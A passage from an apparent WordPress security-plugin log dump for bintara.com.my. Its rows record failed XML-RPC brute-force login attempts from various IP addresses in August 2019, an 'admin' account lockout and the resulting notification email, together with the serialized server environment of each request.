password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/old/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/old/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/old/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCPg0@TGWC-1tzGX5e3wAAAIw\";s:12:\"REDIRECT_URL\";s:15:\"/old/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"103.120.178.112\";s:11:\"REMOTE_PORT\";s:5:\"34852\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/old/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/old/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCPg0@TGWC-1tzGX5e3wAAAIw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566851647.403\";s:12:\"REQUEST_TIME\";s:10:\"1566851647\";}}','notice','2019-08-26 20:34:12','2019-08-26 20:34:08',18306448,19589976,'http://bintara.com.my/old/xmlrpc.php',1,0,'103.120.178.112'),(23258,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCOxTEVi0fEJEHuDZXqwAAAA8\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"66.147.244.247\";s:11:\"REMOTE_PORT\";s:5:\"44043\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCOxTEVi0fEJEHuDZXqwAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851643.3135\";s:12:\"REQUEST_TIME\";s:10:\"1566851643\";}}','notice','2019-08-26 20:34:08','2019-08-26 20:34:03',18304744,19507128,'http://bintara.com.my/new/xmlrpc.php',1,0,'66.147.244.247'),(23255,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-08-27 04:33:55\";s:17:\"lockout_start_gmt\";s:19:\"2019-08-26 20:33:55\";s:14:\"lockout_expire\";s:19:\"2019-08-27 04:48:55\";s:18:\"lockout_expire_gmt\";s:19:\"2019-08-26 20:48:55\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-08-26 20:33:59','2019-08-26 20:33:55',18378160,19497632,'http://bintara.com.my/www/xmlrpc.php',1,0,'104.243.27.148'),(23256,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-08-26 20:33:59','2019-08-26 20:33:55',18584520,19497632,'http://bintara.com.my/www/xmlrpc.php',1,0,'104.243.27.148'),(23257,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCOBTEVi0fEJEHuDZXqQAAABg\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"77.68.64.30\";s:11:\"REMOTE_PORT\";s:5:\"48196\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCOBTEVi0fEJEHuDZXqQAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851640.3422\";s:12:\"REQUEST_TIME\";s:10:\"1566851640\";}}','notice','2019-08-26 20:34:04','2019-08-26 20:34:00',18302648,19503656,'http://bintara.com.my/new/xmlrpc.php',1,0,'77.68.64.30'),(23254,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/www/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/www/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/www/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCMxTEVi0fEJEHuDZXpgAAAAw\";s:12:\"REDIRECT_URL\";s:15:\"/www/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"104.243.27.148\";s:11:\"REMOTE_PORT\";s:5:\"55632\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/www/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/www/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCMxTEVi0fEJEHuDZXpgAAAAw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851635.2984\";s:12:\"REQUEST_TIME\";s:10:\"1566851635\";}}','notice','2019-08-26 20:33:58','2019-08-26 20:33:55',18297736,19497632,'http://bintara.com.my/www/xmlrpc.php',1,0,'104.243.27.148'),(23253,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/news/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/news/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/news/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCMxTEVi0fEJEHuDZXpwAAAA0\";s:12:\"REDIRECT_URL\";s:16:\"/news/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"89.46.105.182\";s:11:\"REMOTE_PORT\";s:5:\"35958\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/news/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/news/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCMxTEVi0fEJEHuDZXpwAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851635.9214\";s:12:\"REQUEST_TIME\";s:10:\"1566851635\";}}','notice','2019-08-26 20:33:58','2019-08-26 20:33:56',18300976,19500848,'http://bintara.com.my/news/xmlrpc.php',1,0,'89.46.105.182'),(23252,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/staging/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCMRTEVi0fEJEHuDZXpQAAAAQ\";s:12:\"REDIRECT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.236.11\";s:11:\"REMOTE_PORT\";s:5:\"55170\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCMRTEVi0fEJEHuDZXpQAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851633.1278\";s:12:\"REQUEST_TIME\";s:10:\"1566851633\";}}','notice','2019-08-26 20:33:55','2019-08-26 20:33:53',18298368,19498192,'http://bintara.com.my/staging/xmlrpc.php',1,0,'198.71.236.11'),(23251,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/www/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/www/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/www/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCLQ0@TGWC-1tzGX5e3AAAAIU\";s:12:\"REDIRECT_URL\";s:15:\"/www/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"5.196.75.52\";s:11:\"REMOTE_PORT\";s:5:\"40040\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/www/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/www/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCLQ0@TGWC-1tzGX5e3AAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566851630.088\";s:12:\"REQUEST_TIME\";s:10:\"1566851630\";}}','notice','2019-08-26 20:33:52','2019-08-26 20:33:50',18298752,19499144,'http://bintara.com.my/www/xmlrpc.php',1,0,'5.196.75.52'),(23250,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/cms/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 